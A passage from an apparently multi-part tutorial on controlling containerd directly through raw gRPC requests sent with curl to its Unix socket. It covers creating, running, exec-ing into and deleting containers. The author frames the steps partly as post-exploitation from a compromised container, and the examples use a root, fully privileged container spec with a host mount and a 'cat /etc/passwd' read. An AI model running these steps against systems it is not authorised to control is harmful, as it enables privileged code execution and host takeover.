options: "lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/290/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/289/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/288/fs"
}
This gives us information on the location of the overlay filesystem locations on disk that we will use when we create a task later on.
Create the container
Now we want to create a container. The container protocol definition file can be used to view services relating to containers.
The list of services provided is as follows:
$ ./protobuf_parser.py -m containers_pb2.py
Services:
* /containerd.services.containers.v1.Containers/Get
Input: GetContainerRequest
Output: GetContainerResponse
* /containerd.services.containers.v1.Containers/List
Input: ListContainersRequest
Output: ListContainersResponse
* /containerd.services.containers.v1.Containers/ListStream
Input: ListContainersRequest
Output: ListContainerMessage
* /containerd.services.containers.v1.Containers/Create
Input: CreateContainerRequest
Output: CreateContainerResponse
* /containerd.services.containers.v1.Containers/Update
Input: UpdateContainerRequest
Output: UpdateContainerResponse
* /containerd.services.containers.v1.Containers/Delete
Input: DeleteContainerRequest
Output: Empty
We use the /containerd.services.containers.v1.Containers/Create
, which uses the CreateContainerRequest
and CreateContainerResponse
messages. The CreateContainerRequest
message looks like the following:
* CreateContainerRequest
Fields:
container - Container
Rough JSON example (might need tweaking):
{
"container": {"id": "string", "labels": "LabelsEntry", "image": "string", "runtime": "Runtime", "spec": "Any", "snapshotter": "string", "snapshot_key": "string", "created_at": "Timestamp", "updated_at": "Timestamp", "extensions": "ExtensionsEntry", "sandbox": "string"}
}
To create the container we need to put together a container definition request. These are actually pretty complex so I will break it up into seperate parts to make it easier to understand. This is the basic structure of the request with the containerspec (the most complex part) excluded. The below structure is comprised of information including labels
taken from the docker.io/library/nginx:1.14.2
image definition that we looked up earlier, and snapshot
values referring to the snapshot we prepared.
$ cat container_template.json
{
"container": {
"id": "nginx",
"labels": {
"maintainer": "NGINX Docker Maintainers <[email protected]>",
"io.cri-containerd.image": "managed",
"io.containerd.image.config.stop-signal": "SIGTERM"
},
"image": "docker.io/library/nginx:1.14.2",
"runtime": {
"name": "io.containerd.runc.v2",
"options": {
"type_url": "containerd.runc.v1.Options"
}
},
"spec": {
"type_url": "types.containerd.io/opencontainers/runtime-spec/1/Spec",
"value": "CONTAINER_SPEC_HERE"
},
"snapshotter": "overlayfs",
"snapshot_key": "nginx"
}
}
The container specification, which will be insterted at the CONTAINER_SPEC_HERE
marker, will be based on the example I have available here. This container spec will create a container running as the root user with a host filesystem mount, and has most of its fields set to usable values. We just need to modify the args
and env
items in the process
section of the document. These will be filled in with data we take from the docker.io/library/nginx:1.14.2
image definition. The values we want are from the Env
and Cmd
fields from the image definition.
The fields in the base template we need to fill in are at the very start of the template, and are shown in the extract below:
{"ociVersion": "1.1.0", "process": {"user": {"uid": 0, "gid": 0, "additionalGids": [0]}, "args": [], "env": [], "cwd": "/", "capabilities": {"bounding":
We want to take the following values from the image definition to fill in the args
and env
fields.
"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","NGINX_VERSION=1.14.2-1~stretch","NJS_VERSION=1.14.2.0.2.6-1~stretch"],"Cmd":["nginx","-g","daemon off;"]
Once we have updated the args
and the env
fields, our completed container specification file containerspec.json
will start like the following:
{"ociVersion": "1.1.0", "process": {"user": {"uid": 0, "gid": 0, "additionalGids": [0]}, "args": ["nginx", "-g", "daemon off;"], "env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "NGINX_VERSION=1.14.2-1~stretch", "NJS_VERSION=1.14.2.0.2.6-1~stretch"], "cwd": "/", "capabilities": {"bounding":
Lets now merge our container template container_template.json
file together with our container spec containerspec.json
together into a combined file testcontainer.json
. This file will then be used to create a CreateContainerRequest
message.
$ python -c "open('testcontainer.json', 'w').write(open('container_template.json').read().replace('\"CONTAINER_SPEC_HERE\"', open('containerspec.json').read().rstrip('\n')))"
Now create the binary CreateContainerRequest
message using the JSON template we have created.
$ ./protobuf_parser.py -m containers_pb2.py -t CreateContainerRequest -i testcontainer.json -o createcontainerrequest.bin
Written to createcontainerrequest.bin
Now lets send the request:
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.containers.v1.Containers/Create --data-binary @createcontainerrequest.bin --output createcontainerresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x556615a10a10)
> POST /containerd.services.containers.v1.Containers/Create HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 23865
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [23865 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [23893 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Our container is now created. Now we need to start a task to make the container actually run.
Create and start a task
Now we want to create a task to make the container run. A task in the containerd context is essentially a process, either the primary one in a continer (as defined in the container image definition) or as a secondary process executing in an already running container. The tasks protocol definition file can be used to control tasks.
The list of services provided is as follows.
$ ./protobuf_parser.py -m tasks_pb2.py
Services:
* /containerd.services.tasks.v1.Tasks/Create
Input: CreateTaskRequest
Output: CreateTaskResponse
* /containerd.services.tasks.v1.Tasks/Start
Input: StartRequest
Output: StartResponse
* /containerd.services.tasks.v1.Tasks/Delete
Input: DeleteTaskRequest
Output: DeleteResponse
* /containerd.services.tasks.v1.Tasks/DeleteProcess
Input: DeleteProcessRequest
Output: DeleteResponse
* /containerd.services.tasks.v1.Tasks/Get
Input: GetRequest
Output: GetResponse
* /containerd.services.tasks.v1.Tasks/List
Input: ListTasksRequest
Output: ListTasksResponse
* /containerd.services.tasks.v1.Tasks/Kill
Input: KillRequest
Output: Empty
* /containerd.services.tasks.v1.Tasks/Exec
Input: ExecProcessRequest
Output: Empty
* /containerd.services.tasks.v1.Tasks/ResizePty
Input: ResizePtyRequest
Output: Empty
* /containerd.services.tasks.v1.Tasks/CloseIO
Input: CloseIORequest
Output: Empty
* /containerd.services.tasks.v1.Tasks/Pause
Input: PauseTaskRequest
Output: Empty
* /containerd.services.tasks.v1.Tasks/Resume
Input: ResumeTaskRequest
Output: Empty
* /containerd.services.tasks.v1.Tasks/ListPids
Input: ListPidsRequest
Output: ListPidsResponse
* /containerd.services.tasks.v1.Tasks/Checkpoint
Input: CheckpointTaskRequest
Output: CheckpointTaskResponse
* /containerd.services.tasks.v1.Tasks/Update
Input: UpdateTaskRequest
Output: Empty
* /containerd.services.tasks.v1.Tasks/Metrics
Input: MetricsRequest
Output: MetricsResponse
* /containerd.services.tasks.v1.Tasks/Wait
Input: WaitRequest
Output: WaitResponse
To create a task we use the /containerd.services.tasks.v1.Tasks/Create
service which uses the CreateTaskRequest
and CreateTaskResponse
messages. The CreateTaskRequest
message looks similar to the following:
* CreateTaskRequest
Fields:
container_id - string
rootfs - Mount
stdin - string
stdout - string
stderr - string
terminal - bool
checkpoint - Descriptor
options - Any
runtime_path - string
Rough JSON example (might need tweaking):
{
"container_id": "string",
"rootfs": {"type": "string", "source": "string", "target": "string", "options": "string"},
"stdin": "string",
"stdout": "string",
"stderr": "string",
"terminal": bool,
"checkpoint": {"media_type": "string", "digest": "string", "size": "int64", "annotations": "AnnotationsEntry"},
"options": {"type_url": "string", "value": "string"},
"runtime_path": "string"
}
This is what our task request will look like.
$ cat createtaskrequest.json
{
"container_id": "nginx",
"rootfs": [
{
"type": "overlay",
"source": "overlay",
"options": [
"index=off",
"workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/45577/work",
"upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/45577/fs",
"lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/290/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/289/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/288/fs"
]
}
],
"stdin": "/run/containerd/fifo/3192704711/nginx-stdin",
"stdout": "/run/containerd/fifo/3192704711/nginx-stdout",
"stderr": "/run/containerd/fifo/3192704711/nginx-stderr"
}
In the above we reference the container we created earlier by its id, and the details of the snapshot that we created earlier. We also reference a number of fifo files for the stdin, stdout and stderr streams for the process - these are files we need to create for ourselves. If you happen to be executing these commands from inside a compromised container, remember that these paths referenced are relative to the containerd hosts filesystem - these are the paths that containerd uses. Also remember that to be usable you need to create these files in a location that you can also access from wherever you are running your commands, although it does not necessarily need to be at the same path (e.g. if you are running from within a compromised container).
Now we need to actually create the named pipes. In the example below, Im again creating the files with filenames relative to the containerd host. If you were executing these commands from a container that accessed the containerd host filesystem via a mount at /host
for example, you would prepend that same value to the start of these paths.
$ sudo mkdir -p /run/containerd/fifo/3192704711/
$ sudo mkfifo /run/containerd/fifo/3192704711/nginx-stdin
$ sudo mkfifo /run/containerd/fifo/3192704711/nginx-stdout
$ sudo mkfifo /run/containerd/fifo/3192704711/nginx-stderr
Now create the binary message file.
$ ./protobuf_parser.py -m tasks_pb2.py -t CreateTaskRequest -i createtaskrequest.json -o createtaskrequest.bin
Written to createtaskrequest.bin
Before sending the request using curl, we need to make sure that we read from the output named pipe files, otherwise the curl request will appear to hang, then then eventually time out. We can do that via commands similar to the following, which we will need to leave running until the next curl command completes. Use multiple shells or background the processes to achieve this.
$ sudo tail -f /run/containerd/fifo/3192704711/nginx-stderr
$ sudo tail -f /run/containerd/fifo/3192704711/nginx-stdout
With those listeners running, send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/Create --data-binary @createtaskrequest.bin --output createtaskresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x556426f579f0)
> POST /containerd.services.tasks.v1.Tasks/Create HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 597
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [597 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [16 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
We have created the task, now we want to start it. This uses the /containerd.services.tasks.v1.Tasks/Start
service and the StartRequest
and StartResponse
messages. The StartRequest
message looks like the following.
* StartRequest
Fields:
container_id - string
exec_id - string
Rough JSON example (might need tweaking):
{
"container_id": "string",
"exec_id": "string"
}
Create a StartRequest
request message.
$ cat startrequest.json
{
"container_id": "nginx"
}
$ ./protobuf_parser.py -m tasks_pb2.py -t StartRequest -i startrequest.json -o startrequest.bin
Written to startrequest.bin
Now send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/Start --data-binary @startrequest.bin --output startresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x56323496d9f0)
> POST /containerd.services.tasks.v1.Tasks/Start HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 12
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [12 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [9 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Now lets parse the response, which will give us the pid of the created task running our container.
$ ./protobuf_parser.py -m tasks_pb2.py -t StartResponse -d startresponse.bin
pid: 61152
We can confirm that the container is running by running a /containerd.services.tasks.v1.Tasks/List
and searching the output for our new task.
$ echo -ne "\x00\x00\x00\x00\x00" | sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/List --data-binary @- --output listtasksresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x559442b45a00)
> POST /containerd.services.tasks.v1.Tasks/List HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 5
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [5 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [22521 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Parse the response and look for a matching entry with the name of our container and a matching pid. Ive shown the command and the appropriate extract of the output in the example below.
$ ./protobuf_parser.py -m tasks_pb2.py -d listtasksresponse.bin -t ListTasksResponse
[SNIP]
tasks {
id: "nginx"
pid: 61152
status: RUNNING
stdin: "/run/containerd/fifo/3192704711/nginx-stdin"
stdout: "/run/containerd/fifo/3192704711/nginx-stdout"
stderr: "/run/containerd/fifo/3192704711/nginx-stderr"
exited_at {
seconds: -62135596800
}
}
[SNIP]
Run a command in an existing container
To run a command in an existing container, we need to
- Identify the id of the container in which we want to run the command
- Create a task
- Start the task
- Cleanup the task when complete
Create a task
For our example we will run our process inside the nginx container we created in the example above, but the process for listing running containers from part 2 can be used if you want to identify an already running container.
We use the /containerd.services.tasks.v1.Tasks/Exec
call for this, which has the ExecProcessRequest
message as an input.
It looks similar to the following:
* ExecProcessRequest
Fields:
container_id - string
stdin - string
stdout - string
stderr - string
terminal - bool
spec - Any
exec_id - string
Rough JSON example (might need tweaking):
{
"container_id": "string",
"stdin": "string",
"stdout": "string",
"stderr": "string",
"terminal": bool,
"spec": {"type_url": "string", "value": "string"},
"exec_id": "string"
}
Heres our working example.
$ cat execprocessrequest.json
{"container_id": "nginx", "stdin": "/run/containerd/fifo/2573972755/catpwd-stdin", "stdout": "/run/containerd/fifo/2573972755/catpwd-stdout", "stderr": "/run/containerd/fifo/2573972755/catpwd-stderr", "spec": {"type_url": "types.containerd.io/opencontainers/runtime-spec/1/Process", "value": {"user": {"uid": 0, "gid": 0, "additionalGids": [0]}, "args": ["cat", "/etc/passwd"], "env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "NGINX_VERSION=1.14.2-1~stretch", "NJS_VERSION=1.14.2.0.2.6-1~stretch"], "cwd": "/", "capabilities": {"bounding": ["CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE", "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE"], "effective": ["CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE", "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE"], "permitted": ["CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE", "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE"]}, "rlimits": [{"type": "RLIMIT_NOFILE", "hard": 1024, "soft": 1024}], "noNewPrivileges": true}}, "exec_id": "catpwd"}
Most of this can be used as a standard boilerplate, you will however need to change the following fields:
- container_id - replace with the id of your target container
- std* - replace with fifo pipe filenames for the stdin, stdout and stderr files in an accessible location with filenames relative to the containerd host
- args - replace with a JSON formatted list of the command you want to run. We are running
cat /etc/passwd
in this case, expresssed as["cat", "/etc/passwd"]
- env - replace with the environment variables for the task - Ive copied mine from the container definition as shown in the container creating example above, but this is not essential
- exec_id - replace with a string to uniquely identify the task (exec-ids were discussed in part 1 if you want more information)
Create a binary version of the message.
$ ./protobuf_parser.py -m tasks_pb2.py -i execprocessrequest.json -o execprocessrequest.bin -t ExecProcessRequest
Written to execprocessrequest.bin
Now we create the pipe files referenced in the message. Remember that these filenames must refer to the same actual files as those in the previous message, but must be specified relative to your command executing location (e.g. if the containerd host filesystem is mounted at /host
add this to the start of the paths below).
$ sudo mkdir -p /run/containerd/fifo/3192704711/
$ sudo mkfifo /run/containerd/fifo/3192704711/nginx-stdin
$ sudo mkfifo /run/containerd/fifo/3192704711/nginx-stdout
$ sudo mkfifo /run/containerd/fifo/3192704711/nginx-stderr
Now send the message.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/Exec --data-binary @execprocessrequest.bin --output execprocessresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55bd79e829f0)
> POST /containerd.services.tasks.v1.Tasks/Exec HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 2751
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [2751 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [5 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Start the task
Now the task is created we need to start it. We use the /containerd.services.tasks.v1.Tasks/Start
service which uses StartRequest
and StartResponse
messages. The StartRequest
message looks like the following:
* StartRequest
Fields:
container_id - string
exec_id - string
Rough JSON example (might need tweaking):
{
"container_id": "string",
"exec_id": "string"
}
Our example looks like the following. Our request refers to the nginx
container and the exec_id
unique string from our earleir task creation message.
$ cat startrequest_catpwd.json
{"container_id":"nginx","exec_id":"catpwd"}
$ ./protobuf_parser.py -m tasks_pb2.py -t StartRequest -i startrequest_catpwd.json -o startrequest_catpwd.bin
Written to startrequest_catpwd.bin
As with the container creation example from earlier, we do need to read from the output named pipe files when we try and start the related process, but in this case we need to make sure that we read enough data from the stdout pipe to retrieve the output from the command we are running, as this is how we access this. For this example the following will suffice. These need to stay executing while we run the next curl command, so use multiple shells or backgrounding.
$ sudo tail -n 1000 -f /run/containerd/fifo/2573972755/catpwd-stderr
$ sudo tail -n 1000 -f /run/containerd/fifo/2573972755/catpwd-stdout
With these commands running, now send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/Start --data-binary @startrequest_catpwd.bin --output startresponse_catpwd.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x5563a40a19f0)
> POST /containerd.services.tasks.v1.Tasks/Start HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 20
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [20 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [9 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
After sending this curl request, the stdout pipe should now have the command output, as in my example below.
$ sudo tail -n 1000 -f /run/containerd/fifo/2573972755/catpwd-stdout
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
nginx:x:101:101:nginx user,,,:/nonexistent:/bin/false
If we also process the output from the curl command we can obtain the pid of the task we just run.
$ ./protobuf_parser.py -m tasks_pb2.py -d startresponse_catpwd.bin -t StartResponse
pid: 71702
Cleanup the task when complete
We now need to cleanup the task as this will remain in the system and disallow reuse of the exec_id until the task is removed. This uses the /containerd.services.tasks.v1.Tasks/DeleteProcess
service, which uses the DeleteProcessRequest
and DeleteResponse
messages. The DeleteProcessRequest
message looks similar to the following:
* DeleteProcessRequest
Fields:
container_id - string
exec_id - string
Rough JSON example (might need tweaking):
{
"container_id": "string",
"exec_id": "string"
}
We create this message using the same container_id
and exec_id
we used to start the task.
$ cat deleteprocessrequest.json
{"container_id":"nginx","exec_id":"catpwd"}
$ ./protobuf_parser.py -m tasks_pb2.py -i deleteprocessrequest.json -o deleteprocessrequest.bin -t DeleteProcessRequest
Written to deleteprocessrequest.bin
Send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/DeleteProcess --data-binary @deleteprocessrequest.bin --output deleteprocessresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55f31a7859f0)
> POST /containerd.services.tasks.v1.Tasks/DeleteProcess HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 20
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [20 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [31 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Now lets parse the response. We should see that this has the same pid from the start command.
$ ./protobuf_parser.py -m tasks_pb2.py -d deleteprocessresponse.bin -t DeleteResponse
id: "catpwd"
pid: 71702
exited_at {
seconds: 1740703849
nanos: 473219169
}
Delete a running container
Finally, lets look at how we can delete the container we created earlier.
To do this, we need to:
- Kill the running task of the container
- Delete the task of the container
- Delete the container
Kill the running task of the container
Killing a task uses the /containerd.services.tasks.v1.Tasks/Kill
and the KillRequest
message type. The KillRequest
message looks like the following:
* KillRequest
Fields:
container_id - string
exec_id - string
signal - uint32
all - bool
Rough JSON example (might need tweaking):
{
"container_id": "string",
"exec_id": "string",
"signal": uint32,
"all": bool
}
We can create a message for our nginx
container like so.
$ cat killrequest.json
{"container_id":"nginx","signal":15}
$ ./protobuf_parser.py -m tasks_pb2.py -i killrequest.json -o killrequest.bin -t KillRequest
Written to killrequest.bin
Send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/Kill --data-binary @killrequest.bin --output killresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x557c3ee2a9f0)
> POST /containerd.services.tasks.v1.Tasks/Kill HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 14
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [14 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [5 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Delete the task of the container
Now we need to delete the stopped task. This uses the /containerd.services.tasks.v1.Tasks/Delete
service which uses the DeleteTaskRequest
and DeleteResponse
messages. The DeleteTaskRequest
message looks similar to the following:
* DeleteTaskRequest
Fields:
container_id - string
Rough JSON example (might need tweaking):
{
"container_id": "string"
}
We can create this message for our nginx
container like so:
$ cat deletetaskrequest.json
{"container_id":"nginx"}
$ ./protobuf_parser.py -m tasks_pb2.py -i deletetaskrequest.json -o deletetaskrequest.bin -t DeleteTaskRequest
Written to deletetaskrequest.bin
Send the request.
